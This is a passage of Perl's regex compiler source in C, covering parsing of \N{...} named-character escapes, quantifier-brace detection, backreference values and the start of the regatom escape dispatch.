* *node_p, *code_point_p, or *flagp.
*
* If <cp_count> is not NULL, the caller wants to know the length (in code
* points) that this \N sequence matches. This is set, and the input is
* parsed for errors, even if the function returns FALSE, as detailed below.
*
* There are 6 possibilities here, as detailed in the next 6 paragraphs.
*
* Probably the most common case is for the \N to specify a single code point.
* *cp_count will be set to 1, and *code_point_p will be set to that code
* point.
*
* Another possibility is for the input to be an empty \N{}. This is no
* longer accepted, and will generate a fatal error.
*
* Another possibility is for a custom charnames handler to be in effect which
* translates the input name to an empty string. *cp_count will be set to 0.
* *node_p will be set to a generated NOTHING node.
*
* Still another possibility is for the \N to mean [^\n]. *cp_count will be
* set to 0. *node_p will be set to a generated REG_ANY node.
*
* The fifth possibility is that \N resolves to a sequence of more than one
* code points. *cp_count will be set to the number of code points in the
* sequence. *node_p will be set to a generated node returned by this
* function calling S_reg().
*
* The final possibility is that it is premature to be calling this function;
* the parse needs to be restarted. This can happen when the rules change
* from /d to /u, or when the pattern needs to be upgraded to UTF-8. The
* latter occurs only when the fifth possibility would otherwise be in
* effect, and is because one of those code points requires the pattern to be
* recompiled as UTF-8. The function returns FALSE, and sets the
* RESTART_PARSE and NEED_UTF8 flags in *flagp, as appropriate. When this
* happens, the caller needs to desist from continuing parsing, and return
* this information to its caller. This is not set for when there is only one
* code point, as this can be called as part of an ANYOF node, and they can
* store above-Latin1 code points without the pattern having to be in UTF-8.
*
* For non-single-quoted regexes, the tokenizer has resolved character and
* sequence names inside \N{...} into their Unicode values, normalizing the
* result into what we should see here: '\N{U+c1.c2...}', where c1... are the
* hex-represented code points in the sequence. This is done there because
* the names can vary based on what charnames pragma is in scope at the time,
* so we need a way to take a snapshot of what they resolve to at the time of
* the original parse. [perl #56444].
*
* That parsing is skipped for single-quoted regexes, so here we may get
* '\N{NAME}', which is parsed now. If the single-quoted regex is something
* like '\N{U+41}', that code point is Unicode, and has to be translated into
* the native character set for non-ASCII platforms. The other possibilities
* are already native, so no translation is done. */
char * endbrace; /* points to '}' following the name */
char* p = RExC_parse; /* Temporary */
SV * substitute_parse = NULL;
char *orig_end;
char *save_start;
I32 flags;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_GROK_BSLASH_N;
GET_RE_DEBUG_FLAGS;
assert(cBOOL(node_p) ^ cBOOL(code_point_p)); /* Exactly one should be set */
assert(! (node_p && cp_count)); /* At most 1 should be set */
if (cp_count) { /* Initialize return for the most common case */
*cp_count = 1;
}
/* The [^\n] meaning of \N ignores spaces and comments under the /x
* modifier. The other meanings do not, so use a temporary until we find
* out which we are being called with */
skip_to_be_ignored_text(pRExC_state, &p,
FALSE /* Don't force to /x */ );
/* Disambiguate between \N meaning a named character versus \N meaning
* [^\n]. The latter is assumed when the {...} following the \N is a legal
* quantifier, or if there is no '{' at all */
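/* For example, in /\N{3}/ the braces form a legal quantifier, so the \N
 * means [^\n] repeated 3 times and is handled here; in /\N{U+41}/ or
 * /\N{LATIN SMALL LETTER A}/ there is no legal quantifier, so the named
 * or numeric character handling further below applies. */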
if (*p != '{' || regcurly(p)) {
RExC_parse = p;
if (cp_count) {
*cp_count = -1;
}
if (! node_p) {
return FALSE;
}
*node_p = reg_node(pRExC_state, REG_ANY);
*flagp |= HASWIDTH|SIMPLE;
MARK_NAUGHTY(1);
Set_Node_Length(REGNODE_p(*(node_p)), 1); /* MJD */
return TRUE;
}
/* The test above made sure that the next real character is a '{', but
* under the /x modifier, it could be separated by space (or a comment and
* \n) and this is not allowed (for consistency with \x{...} and the
* tokenizer handling of \N{NAME}). */
if (*RExC_parse != '{') {
vFAIL("Missing braces on \\N{}");
}
RExC_parse++; /* Skip past the '{' */
endbrace = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (! endbrace) { /* no trailing brace */
vFAIL2("Missing right brace on \\%c{}", 'N');
}
/* Here, we have decided it should be a named character or sequence. These
* imply Unicode semantics */
REQUIRE_UNI_RULES(flagp, FALSE);
/* \N{_} is what toke.c returns to us to indicate a name that evaluates to
* nothing at all (not allowed under strict) */
if (endbrace - RExC_parse == 1 && *RExC_parse == '_') {
RExC_parse = endbrace;
if (strict) {
RExC_parse++; /* Position after the "}" */
vFAIL("Zero length \\N{}");
}
if (cp_count) {
*cp_count = 0;
}
nextchar(pRExC_state);
if (! node_p) {
return FALSE;
}
*node_p = reg_node(pRExC_state, NOTHING);
return TRUE;
}
if (endbrace - RExC_parse < 2 || ! strBEGINs(RExC_parse, "U+")) {
/* Here, the name isn't of the form U+.... This can happen if the
* pattern is single-quoted, so didn't get evaluated in toke.c. Now
* is the time to find out what the name means */
const STRLEN name_len = endbrace - RExC_parse;
SV * value_sv; /* What does this name evaluate to */
SV ** value_svp;
const U8 * value; /* string of name's value */
STRLEN value_len; /* and its length */
/* RExC_unlexed_names is a hash of names that weren't evaluated by
* toke.c, and their values. Make sure it is initialized */
if (! RExC_unlexed_names) {
RExC_unlexed_names = newHV();
}
/* If we have already seen this name in this pattern, use that. This
* allows us to only call the charnames handler once per name per
* pattern. A broken or malicious handler could return something
* different each time, which could cause the results to vary depending
* on whether something gets added or subtracted from the pattern that
* causes the number of passes to change, for example */
if ((value_svp = hv_fetch(RExC_unlexed_names, RExC_parse,
name_len, 0)))
{
value_sv = *value_svp;
}
else { /* Otherwise we have to go out and get the name */
const char * error_msg = NULL;
value_sv = get_and_check_backslash_N_name(RExC_parse, endbrace,
UTF,
&error_msg);
if (error_msg) {
RExC_parse = endbrace;
vFAIL(error_msg);
}
/* If no error message, should have gotten a valid return */
assert (value_sv);
/* Save the name's meaning for later use */
if (! hv_store(RExC_unlexed_names, RExC_parse, name_len,
value_sv, 0))
{
Perl_croak(aTHX_ "panic: hv_store() unexpectedly failed");
}
}
/* Here, we have the value the name evaluates to in 'value_sv' */
value = (U8 *) SvPV(value_sv, value_len);
/* See if the result is one code point vs 0 or multiple */
if (value_len > 0 && value_len <= (UV) ((SvUTF8(value_sv))
? UTF8SKIP(value)
: 1))
{
/* Here, exactly one code point. If that isn't what is wanted,
* fail */
if (! code_point_p) {
RExC_parse = p;
return FALSE;
}
/* Convert from string to numeric code point */
*code_point_p = (SvUTF8(value_sv))
? valid_utf8_to_uvchr(value, NULL)
: *value;
/* Have parsed this entire single code point \N{...}. *cp_count
* has already been set to 1, so don't do it again. */
RExC_parse = endbrace;
nextchar(pRExC_state);
return TRUE;
} /* End of is a single code point */
/* Count the code points, if caller desires. The API says to do this
* even if we will later return FALSE */
if (cp_count) {
*cp_count = 0;
*cp_count = (SvUTF8(value_sv))
? utf8_length(value, value + value_len)
: value_len;
}
/* Fail if caller doesn't want to handle a multi-code-point sequence.
* But don't back the pointer up if the caller wants to know how many
* code points there are (they need to handle it themselves in this
* case). */
if (! node_p) {
if (! cp_count) {
RExC_parse = p;
}
return FALSE;
}
/* Convert this to a sub-pattern of the form "(?: ... )", and then call
* reg recursively to parse it. That way, it retains its atomicness,
* while not having to worry about any special handling that some code
* points may have. */
substitute_parse = newSVpvs("?:");
sv_catsv(substitute_parse, value_sv);
sv_catpv(substitute_parse, ")");
#ifdef EBCDIC
/* The value should already be native, so no need to convert on EBCDIC
* platforms.*/
assert(! RExC_recode_x_to_native);
#endif
}
else { /* \N{U+...} */
Size_t count = 0; /* code point count kept internally */
/* We can get to here when the input is \N{U+...} or when toke.c has
* converted a name to the \N{U+...} form. This includes changing a
* name that evaluates to multiple code points to \N{U+c1.c2.c3 ...} */
RExC_parse += 2; /* Skip past the 'U+' */
/* Code points are separated by dots. The '}' terminates the whole
* thing. */
do { /* Loop until the ending brace */
UV cp = 0;
char * start_digit; /* The first of the current code point */
if (! isXDIGIT(*RExC_parse)) {
RExC_parse++;
vFAIL("Invalid hexadecimal number in \\N{U+...}");
}
start_digit = RExC_parse;
count++;
/* Loop through the hex digits of the current code point */
do {
/* Adding this digit will shift the result 4 bits. If that
* result would be above the legal max, it's overflow */
if (cp > MAX_LEGAL_CP >> 4) {
/* Find the end of the code point */
do {
RExC_parse ++;
} while (isXDIGIT(*RExC_parse) || *RExC_parse == '_');
/* Be sure to synchronize this message with the similar one
* in utf8.c */
vFAIL4("Use of code point 0x%.*s is not allowed; the"
" permissible max is 0x%" UVxf,
(int) (RExC_parse - start_digit), start_digit,
MAX_LEGAL_CP);
}
/* Accumulate this (valid) digit into the running total */
cp = (cp << 4) + READ_XDIGIT(RExC_parse);
/* READ_XDIGIT advanced the input pointer. Ignore a single
* underscore separator */
if (*RExC_parse == '_' && isXDIGIT(RExC_parse[1])) {
RExC_parse++;
}
} while (isXDIGIT(*RExC_parse));
/* Here, have accumulated the next code point */
if (RExC_parse >= endbrace) { /* If done ... */
if (count != 1) {
goto do_concat;
}
/* Here, it is a single code point; fail if the caller doesn't want that */
if (! code_point_p) {
RExC_parse = p;
return FALSE;
}
/* A single code point is easy to handle; just return it */
*code_point_p = UNI_TO_NATIVE(cp);
RExC_parse = endbrace;
nextchar(pRExC_state);
return TRUE;
}
/* Here, the only legal thing would be a multiple character
* sequence (of the form "\N{U+c1.c2. ... }". So the next
* character must be a dot (and the one after that can't be the
* endbrace, or we'd have something like \N{U+100.} ) */
if (*RExC_parse != '.' || RExC_parse + 1 >= endbrace) {
RExC_parse += (RExC_orig_utf8) /* point to after 1st invalid */
? UTF8SKIP(RExC_parse)
: 1;
if (RExC_parse >= endbrace) { /* Guard against malformed utf8 */
RExC_parse = endbrace;
}
vFAIL("Invalid hexadecimal number in \\N{U+...}");
}
/* Here, it looks like it's really a multiple character sequence. Fail
* if that's not what the caller wants. But continue with counting
* and error checking if they still want a count */
if (! node_p && ! cp_count) {
return FALSE;
}
/* What is done here is to convert this to a sub-pattern of the
* form \x{char1}\x{char2}... and then call reg recursively to
* parse it (enclosing in "(?: ... )" ). That way, it retains its
* atomicness, while not having to worry about special handling
* that some code points may have. We don't create a subpattern,
* but go through the motions of code point counting and error
* checking, if the caller doesn't want a node returned. */
if (node_p && count == 1) {
substitute_parse = newSVpvs("?:");
}
do_concat:
if (node_p) {
/* Convert to notation the rest of the code understands */
sv_catpvs(substitute_parse, "\\x{");
sv_catpvn(substitute_parse, start_digit,
RExC_parse - start_digit);
sv_catpvs(substitute_parse, "}");
}
/* Move to after the dot (or ending brace the final time through.)
* */
RExC_parse++;
count++;
} while (RExC_parse < endbrace);
if (! node_p) { /* Doesn't want the node */
assert (cp_count);
*cp_count = count;
return FALSE;
}
sv_catpvs(substitute_parse, ")");
#ifdef EBCDIC
/* The values are Unicode, and therefore have to be converted to native
* on a non-Unicode (meaning non-ASCII) platform. */
RExC_recode_x_to_native = 1;
#endif
}
/* Here, we have the string the name evaluates to, ready to be parsed,
* stored in 'substitute_parse' as a series of valid "\x{...}\x{...}"
* constructs. This can be called from within a substitute parse already.
* The error reporting mechanism doesn't work for 2 levels of this, but the
* code above has validated this new construct, so there should be no
* errors generated by the code below. And this isn't an exact copy, so the
* mechanism to seamlessly deal with this won't work, so turn off warnings
* during it */
save_start = RExC_start;
orig_end = RExC_end;
RExC_parse = RExC_start = SvPVX(substitute_parse);
RExC_end = RExC_parse + SvCUR(substitute_parse);
TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE;
*node_p = reg(pRExC_state, 1, &flags, depth+1);
/* Restore the saved values */
RESTORE_WARNINGS;
RExC_start = save_start;
RExC_parse = endbrace;
RExC_end = orig_end;
#ifdef EBCDIC
RExC_recode_x_to_native = 0;
#endif
SvREFCNT_dec_NN(substitute_parse);
if (! *node_p) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: reg returned failure to grok_bslash_N, flags=%#" UVxf,
(UV) flags);
}
*flagp |= flags&(HASWIDTH|SPSTART|SIMPLE|POSTPONED);
nextchar(pRExC_state);
return TRUE;
}
PERL_STATIC_INLINE U8
S_compute_EXACTish(RExC_state_t *pRExC_state)
{
U8 op;
PERL_ARGS_ASSERT_COMPUTE_EXACTISH;
if (! FOLD) {
return (LOC)
? EXACTL
: EXACT;
}
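/* Under /i the folding node type is computed arithmetically from the
 * charset in effect; this relies on the EXACTF-family regnodes being
 * declared in the same relative order as the regex_charset enum (with
 * the adjustment below closing the gap noted in its comment). */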
op = get_regex_charset(RExC_flags);
if (op >= REGEX_ASCII_RESTRICTED_CHARSET) {
op--; /* /a is same as /u, and map /aa's offset to what /a's would have
been, so there is no hole */
}
return op + EXACTF;
}
STATIC bool
S_new_regcurly(const char *s, const char *e)
{
/* This is a temporary function designed to match the most lenient form of
* a {m,n} quantifier we ever envision, with either number omitted, and
* spaces anywhere between/before/after them.
*
* If this function fails, then the string it matches is very unlikely to
* ever be considered a valid quantifier, so we can allow the '{' that
* begins it to be considered as a literal */
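/* For example, "{3}", "{ 3 , 5 }", "{,5}" and "{3,}" all pass this
 * test, while "{}" and "{a}" do not, so the '{' in the latter two may
 * be treated as a literal character. */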
bool has_min = FALSE;
bool has_max = FALSE;
PERL_ARGS_ASSERT_NEW_REGCURLY;
if (s >= e || *s++ != '{')
return FALSE;
while (s < e && isSPACE(*s)) {
s++;
}
while (s < e && isDIGIT(*s)) {
has_min = TRUE;
s++;
}
while (s < e && isSPACE(*s)) {
s++;
}
if (*s == ',') {
s++;
while (s < e && isSPACE(*s)) {
s++;
}
while (s < e && isDIGIT(*s)) {
has_max = TRUE;
s++;
}
while (s < e && isSPACE(*s)) {
s++;
}
}
return s < e && *s == '}' && (has_min || has_max);
}
/* Parse backref decimal value, unless it's too big to sensibly be a backref,
* in which case return I32_MAX (rather than possibly 32-bit wrapping) */
static I32
S_backref_value(char *p, char *e)
{
const char* endptr = e;
UV val;
if (grok_atoUV(p, &val, &endptr) && val <= I32_MAX)
return (I32)val;
return I32_MAX;
}
/*
- regatom - the lowest level
Try to identify anything special at the start of the current parse position.
If there is, then handle it as required. This may involve generating a
single regop, such as for an assertion; or it may involve recursing, such as
to handle a () structure.
If the string doesn't start with something special then we gobble up
as much literal text as we can. If we encounter a quantifier, we have to
back off the final literal character, as that quantifier applies to just it
and not to the whole string of literals.
Once we have been able to handle whatever type of thing started the
sequence, we return the offset into the regex engine program being compiled
at which any next regnode should be placed.
Returns 0, setting *flagp to TRYAGAIN if reg() returns 0 with TRYAGAIN.
Returns 0, setting *flagp to RESTART_PARSE if the parse needs to be
restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to UTF-8
Otherwise does not return 0.
Note: we have to be careful with escapes, as they can be both literal
and special, and in the case of \10 and friends, context determines which.
A summary of the code structure is:
switch (first_byte) {
cases for each special:
handle this special;
break;
case '\\':
switch (2nd byte) {
cases for each unambiguous special:
handle this special;
break;
cases for each ambiguous special/literal:
disambiguate;
if (special) handle here
else goto defchar;
default: // unambiguously literal:
goto defchar;
}
default: // is a literal char
// FALL THROUGH
defchar:
create EXACTish node for literal;
while (more input and node isn't full) {
switch (input_byte) {
cases for each special;
make sure parse pointer is set so that the next call to
regatom will see this special first
goto loopdone; // EXACTish node terminated by prev. char
default:
append char to EXACTISH node;
}
get next input byte;
}
loopdone:
}
return the generated node;
Specifically there are two separate switches for handling
escape sequences, with the one for handling literal escapes requiring
a dummy entry for all of the special escapes that are actually handled
by the other.
*/
STATIC regnode_offset
S_regatom(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth)
{
dVAR;
regnode_offset ret = 0;
I32 flags = 0;
char *parse_start;
U8 op;
int invert = 0;
U8 arg;
GET_RE_DEBUG_FLAGS_DECL;
*flagp = WORST; /* Tentatively. */
DEBUG_PARSE("atom");
PERL_ARGS_ASSERT_REGATOM;
tryagain:
parse_start = RExC_parse;
assert(RExC_parse < RExC_end);
switch ((U8)*RExC_parse) {
case '^':
RExC_seen_zerolen++;
nextchar(pRExC_state);
if (RExC_flags & RXf_PMf_MULTILINE)
ret = reg_node(pRExC_state, MBOL);
else
ret = reg_node(pRExC_state, SBOL);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '$':
nextchar(pRExC_state);
if (*RExC_parse)
RExC_seen_zerolen++;
if (RExC_flags & RXf_PMf_MULTILINE)
ret = reg_node(pRExC_state, MEOL);
else
ret = reg_node(pRExC_state, SEOL);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '.':
nextchar(pRExC_state);
if (RExC_flags & RXf_PMf_SINGLELINE)
ret = reg_node(pRExC_state, SANY);
else
ret = reg_node(pRExC_state, REG_ANY);
*flagp |= HASWIDTH|SIMPLE;
MARK_NAUGHTY(1);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '[':
{
char * const oregcomp_parse = ++RExC_parse;
ret = regclass(pRExC_state, flagp, depth+1,
FALSE, /* means parse the whole char class */
TRUE, /* allow multi-char folds */
FALSE, /* don't silence non-portable warnings. */
(bool) RExC_strict,
TRUE, /* Allow an optimized regnode result */
NULL);
if (ret == 0) {
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
FAIL2("panic: regclass returned failure to regatom, flags=%#" UVxf,
(UV) *flagp);
}
if (*RExC_parse != ']') {
RExC_parse = oregcomp_parse;
vFAIL("Unmatched [");
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(ret), RExC_parse - oregcomp_parse + 1); /* MJD */
break;
}
case '(':
nextchar(pRExC_state);
ret = reg(pRExC_state, 2, &flags, depth+1);
if (ret == 0) {
if (flags & TRYAGAIN) {
if (RExC_parse >= RExC_end) {
/* Make parent create an empty node if needed. */
*flagp |= TRYAGAIN;
return(0);
}
goto tryagain;
}
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: reg returned failure to regatom, flags=%#" UVxf,
(UV) flags);
}
*flagp |= flags&(HASWIDTH|SPSTART|SIMPLE|POSTPONED);
break;
case '|':
case ')':
if (flags & TRYAGAIN) {
*flagp |= TRYAGAIN;
return 0;
}
vFAIL("Internal urp");
/* Supposed to be caught earlier. */
break;
case '?':
case '+':
case '*':
RExC_parse++;
vFAIL("Quantifier follows nothing");
break;
case '\\':
/* Special Escapes
This switch handles escape sequences that resolve to some kind
of special regop and not to literal text. Escape sequences that
resolve to literal text are handled below in the switch marked
"Literal Escapes".
Every entry in this switch *must* have a corresponding entry
in the literal escape switch. However, the opposite is not
required, as the default for this switch is to jump to the
literal text handling code.
*/
RExC_parse++;
switch ((U8)*RExC_parse) {
/* Special Escapes */
case 'A':
RExC_seen_zerolen++;
ret = reg_node(pRExC_state, SBOL);
/* SBOL is shared with /^/ so we set the flags so we can tell
* /\A/ from /^/ in split. */
FLAGS(REGNODE_p(ret)) = 1;
*flagp |= SIMPLE;
goto finish_meta_pat;
case 'G':
ret = reg_node(pRExC_state, GPOS);
RExC_seen |= REG_GPOS_SEEN;
*flagp |= SIMPLE;
goto finish_meta_pat;
case 'K':
RExC_seen_zerolen++;
ret = reg_node(pRExC_state, KEEPS);
*flagp |= SIMPLE;
/* XXX:dmq : disabling in-place substitution seems to
* be necessary here to avoid cases of memory corruption, as
* with: C<$_="x" x 80; s/x\K/y/> -- rgs
*/
RExC_seen |= REG_LOOKBEHIND_SEEN;
goto finish_meta_pat;
case 'Z':
ret = reg_node(pRExC_state, SEOL);
*flagp |= SIMPLE;
RExC_seen_zerolen++; /* Do not optimize RE away */
goto finish_meta_pat;
case 'z':
ret = reg_node(pRExC_state, EOS);
*flagp |= SIMPLE;
RExC_seen_zerolen++; /* Do not optimize RE away */
goto finish_meta_pat;
case 'C':
vFAIL("\\C no longer supported");
case 'X':
ret = reg_node(pRExC_state, CLUMP);
*flagp |= HASWIDTH;
goto finish_meta_pat;
case 'W':
invert = 1;
/* FALLTHROUGH */
case 'w':
arg = ANYOF_WORDCHAR;
goto join_posix;
case 'B':
invert = 1;
/* FALLTHROUGH */
case 'b':
{
U8 flags = 0;
regex_charset charset = get_regex_charset(RExC_flags);
RExC_seen_zerolen++;
RExC_seen |= REG_LOOKBEHIND_SEEN;
op = BOUND + charset;
if (RExC_parse >= RExC_end || *(RExC_parse + 1) != '{') {
flags = TRADITIONAL_BOUND;
if (op > BOUNDA) { /* /aa is same as /a */
op = BOUNDA;
}
}
else {
STRLEN length;
char name = *RExC_parse;
char * endbrace = NULL;
RExC_parse += 2;
endbrace = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (! endbrace) {
vFAIL2("Missing right brace on \\%c{}", name);
}
/* XXX Need to decide whether to take spaces or not. Should be
* consistent with \p{}, but that currently is SPACE, which
* means vertical too, which seems wrong
* while (isBLANK(*RExC_parse)) {
RExC_parse++;
}*/
if (endbrace == RExC_parse) {
RExC_parse++; /* After the '}' */
vFAIL2("Empty \\%c{}", name);
}
length = endbrace - RExC_parse;
/*while (isBLANK(*(RExC_parse + length - 1))) {
length--;
}*/
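/* The recognized bound types are \b{g} / \b{gcb} (grapheme cluster
 * boundary), \b{lb} (line break), \b{sb} (sentence boundary) and
 * \b{wb} (word boundary); anything else falls through to the error at
 * bad_bound_type. */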
switch (*RExC_parse) {
case 'g':
if ( length != 1
&& (memNEs(RExC_parse + 1, length - 1, "cb")))
{
goto bad_bound_type;
}
flags = GCB_BOUND;
break;
case 'l':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = LB_BOUND;
break;
case 's':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = SB_BOUND;
break;
case 'w':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = WB_BOUND;
break;
default:
bad_bound_type:
RExC_parse = endbrace;
vFAIL2utf8f(
"'%" UTF8f "' is an unknown bound type",
UTF8fARG(UTF, length, endbrace - length));
NOT_REACHED; /*NOTREACHED*/
}
RExC_parse = endbrace;
REQUIRE_UNI_RULES(flagp, 0);
if (op == BOUND) {
op = BOUNDU;
}
else if (op >= BOUNDA) { /* /aa is same as /a */
op = BOUNDU;
length += 4;
/* Don't have to worry about UTF-8 in this message, because
* to get here the contents of the \b must be ASCII */
ckWARN4reg(RExC_parse + 1, /* Include the '}' in msg */
"Using /u for '%.*s' instead of /%s",
(unsigned) length,
endbrace - length + 1,
(charset == REGEX_ASCII_RESTRICTED_CHARSET)
? ASCII_RESTRICT_PAT_MODS
: ASCII_MORE_RESTRICT_PAT_MODS);
}
}
if (op == BOUND) {
RExC_seen_d_op = TRUE;
}
else if (op == BOUNDL) {
RExC_contains_locale = 1;
}
if (invert) {
op += NBOUND - BOUND;
}
ret = reg_node(pRExC_state, op);
FLAGS(REGNODE_p(ret)) = flags;
*flagp |= SIMPLE;
goto finish_meta_pat;
}
case 'D':
invert = 1;
/* FALLTHROUGH */
case 'd':
arg = ANYOF_DIGIT;
if (! DEPENDS_SEMANTICS) {
goto join_posix;
}
/* \d doesn't have any matches in the upper Latin1 range, hence /d
* is equivalent to /u. Changing to /u saves some branches at
* runtime */
op = POSIXU;
goto join_posix_op_known;
case 'R':
ret = reg_node(pRExC_state, LNBREAK);
*flagp |= HASWIDTH|SIMPLE;
goto finish_meta_pat;
case 'H':
invert = 1;
/* FALLTHROUGH */
case 'h':
arg = ANYOF_BLANK;
op = POSIXU;
goto join_posix_op_known;
case 'V':
invert = 1;
/* FALLTHROUGH */
case 'v':
arg = ANYOF_VERTWS;
op = POSIXU;
goto join_posix_op_known;
case 'S':
invert = 1;
/* FALLTHROUGH */
case 's':
arg = ANYOF_SPACE;
join_posix:
op = POSIXD + get_regex_charset(RExC_flags);
if (op > POSIXA) { /* /aa is same as /a */
op = POSIXA;
}
else if (op == POSIXL) {
RExC_contains_locale = 1;
}
else if (op == POSIXD) {
RExC_seen_d_op = TRUE;
}
join_posix_op_known:
if (invert) {
op += NPOSIXD - POSIXD;
}
ret = reg_node(pRExC_state, op);
FLAGS(REGNODE_p(ret)) = namedclass_to_classnum(arg);
*flagp |= HASWIDTH|SIMPLE;
/* FALLTHROUGH */
finish_meta_pat:
if ( UCHARAT(RExC_parse + 1) == '{'
&& UNLIKELY(! new_regcurly(RExC_parse + 1, RExC_end)))
{
RExC_parse += 2;
vFAIL("Unescaped left brace in regex is illegal here");
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(ret), 2); /* MJD */
break;
case 'p':
case 'P':
RExC_parse--;
ret = regclass(pRExC_state, flagp, depth+1,
TRUE, /* means just parse this element */
FALSE, /* don't allow multi-char folds */
FALSE, /* don't silence non-portable warnings. It
would be a bug if these returned
non-portables */
(bool) RExC_strict,
TRUE, /* Allow an optimized regnode result */
NULL);
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!ret)
FAIL2("panic: regclass returned failure to regatom, flags=%#" UVxf,
(UV) *flagp);
RExC_parse--;
Set_Node_Offset(REGNODE_p(ret), parse_start);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start - 2);
nextchar(pRExC_state);
break;
case 'N':
/* Handle \N, \N{} and \N{NAMED SEQUENCE} (the latter meaning the
* \N{...} evaluates to a sequence of more than one code point).
* The function call below returns a regnode, which is our result.
* The parameters cause it to fail if the \N{} evaluates to a
* single code point; we handle those like any other literal. The
* reason that the multicharacter case is handled here and not as
* part of the EXACTish code is because of quantifiers. In
* /\N{BLAH}+/, the '+' applies to the whole thing, and doing it
* this way makes that Just Happen. dmq.
* join_exact() will join this up with adjacent EXACTish nodes
* later on, if appropriate. */
++RExC_parse;
if (grok_bslash_N(pRExC_state,
&ret, /* Want a regnode returned */
NULL, /* Fail if evaluates to a single code
point */
NULL, /* Don't need a count of how many code
points */
flagp,
RExC_strict,
depth)
) {
break;
}
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* Here, evaluates to a single code point. Go get that */
RExC_parse = parse_start;
goto defchar;
case 'k': /* Handle \k<NAME> and \k'NAME' */
parse_named_seq:
{
char ch;
if ( RExC_parse >= RExC_end - 1
|| (( ch = RExC_parse[1]) != '<'
&& ch != '\''
&& ch != '{'))
{
RExC_parse++;
/* diag_listed_as: Sequence \%s... not terminated in regex; marked by <-- HERE in m/%s/ */
vFAIL2("Sequence %.2s... not terminated", parse_start);
} else {
RExC_parse += 2;
ret = handle_named_backref(pRExC_state,
flagp,
parse_start,
(ch == '<')
? '>'
: (ch == '{')
? '}'
: '\'');
}
break;
}
case 'g':
case '1': case '2': case '3': case '4':
case '5': case '6': case '7': case '8': case '9':
{
I32 num;
bool hasbrace = 0;
if (*RExC_parse == 'g') {
bool isrel = 0;
RExC_parse++;
if (*RExC_parse == '{') {
RExC_parse++;
hasbrace = 1;
}
if (*RExC_parse == '-') {
RExC_parse++;
isrel = 1;
}
if (hasbrace && !isDIGIT(*RExC_parse)) {
if (isrel) RExC_parse--;
RExC_parse -= 2;
goto parse_named_seq;
}
if (RExC_parse >= RExC_end) {
goto unterminated_g;
}
num = S_backref_value(RExC_parse, RExC_end);
if (num == 0)
vFAIL("Reference to invalid group 0");
else if (num == I32_MAX) {
if (isDIGIT(*RExC_parse))
vFAIL("Reference to nonexistent group");
else
unterminated_g:
vFAIL("Unterminated \\g... pattern");
}
if (isrel) {
num = RExC_npar - num;
if (num < 1)
vFAIL("Reference to nonexistent or unclosed group");
}
}
else {
num = S_backref_value(RExC_parse, RExC_end);
/* bare \NNN might be backref or octal - if it is larger
* than or equal to RExC_npar then it is assumed to be an
* octal escape. Note RExC_npar is +1 from the actual
* number of parens. */
/* Note we do NOT check if num == I32_MAX here, as that is
* handled by the RExC_npar check */
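/* Illustratively: with, say, three capture groups seen so far
* (RExC_npar == 4), \2 is always a backref (single digit); \12 is
* taken as the octal escape for "\n" since 12 >= RExC_npar; while
* \82 can't be octal (it starts with '8') and so is left to be
* treated as a possible backref. */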
if (
/* any numeric escape < 10 is always a backref */
num > 9
/* any numeric escape < RExC_npar is a backref */
&& num >= RExC_npar
/* cannot be an octal escape if it starts with 8 */
&& *RExC_parse != '8'
/* cannot be an octal escape if it starts with 9 */
&& *RExC_parse != '9'
) {
/* Probably not meant to be a backref, instead likely
* to be an octal character escape, e.g. \35 or \777.
* The above logic should make it obvious why using
* octal escapes in patterns is problematic. - Yves */
RExC_parse = parse_start;
goto defchar;
}
}
/* At this point RExC_parse points at a numeric escape like
* \12 or \88 or something similar, which we should NOT treat
* as an octal escape. It may or may not be a valid backref
* escape. For instance \88888888 is unlikely to be a valid
* backref. */
while (isDIGIT(*RExC_parse))
RExC_parse++;
if (hasbrace) {
if (*RExC_parse != '}')
vFAIL("Unterminated \\g{...} pattern");
RExC_parse++;
}
if (num >= (I32)RExC_npar) {
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
if (num >= RExC_total_parens) {
vFAIL("Reference to nonexistent group");
}
}
else {
REQUIRE_PARENS_PASS;
}
}
RExC_sawback = 1;
ret = reganode(pRExC_state,
((! FOLD)
? REF
: (ASCII_FOLD_RESTRICTED)
? REFFA
: (AT_LEAST_UNI_SEMANTICS)
? REFFU
: (LOC)
? REFFL
: REFF),
num);
if (OP(REGNODE_p(ret)) == REFF) {
RExC_seen_d_op = TRUE;
}
*flagp |= HASWIDTH;
/* override incorrect value set in reganode MJD */
Set_Node_Offset(REGNODE_p(ret), parse_start);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start-1);
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
}
break;
case '\0':
if (RExC_parse >= RExC_end)
FAIL("Trailing \\");
/* FALLTHROUGH */
default:
/* Do not generate "unrecognized" warnings here; we fall
back into the quick-grab loop below */
RExC_parse = parse_start;
goto defchar;
} /* end of switch on a \foo sequence */
break;
case '#':
/* '#' comments should have been spaced over before this function was
* called */
assert((RExC_flags & RXf_PMf_EXTENDED) == 0);
/*
if (RExC_flags & RXf_PMf_EXTENDED) {
RExC_parse = reg_skipcomment( pRExC_state, RExC_parse );
